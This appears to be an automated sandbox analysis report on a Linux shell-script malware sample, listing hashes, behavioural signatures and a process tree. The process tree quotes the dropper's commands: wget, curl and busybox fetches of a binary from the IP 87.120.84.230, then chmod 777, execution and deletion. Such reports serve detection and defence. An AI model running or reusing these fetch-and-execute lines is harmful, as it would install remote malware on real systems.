Analysis
max time kernel: 31s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 18/10/2024, 02:59
Static task: static1
Behavioral task: behavioral1
  Sample: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
  Resource: debian9-mipsel-20240611-en
General
Target: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Size: 10KB
MD5: 3aaf11d0f07a6e2ac3ecd444e17b7264
SHA1: 20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
SHA256: e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
SHA512: d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
SSDEEP: 192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh: /tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh (PID 1511)
  /bin/rm: /bin/rm bins.sh (PID 1512)
  /usr/bin/wget: wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1513)
  /usr/bin/curl: curl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1517) [Writes file to tmp directory]
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1518)
  /bin/chmod: chmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1519) [File and Directory Permissions Modification]
  /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t: ./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1520) [Executes dropped EXE]
  /bin/rm: rm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t (PID 1521)
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97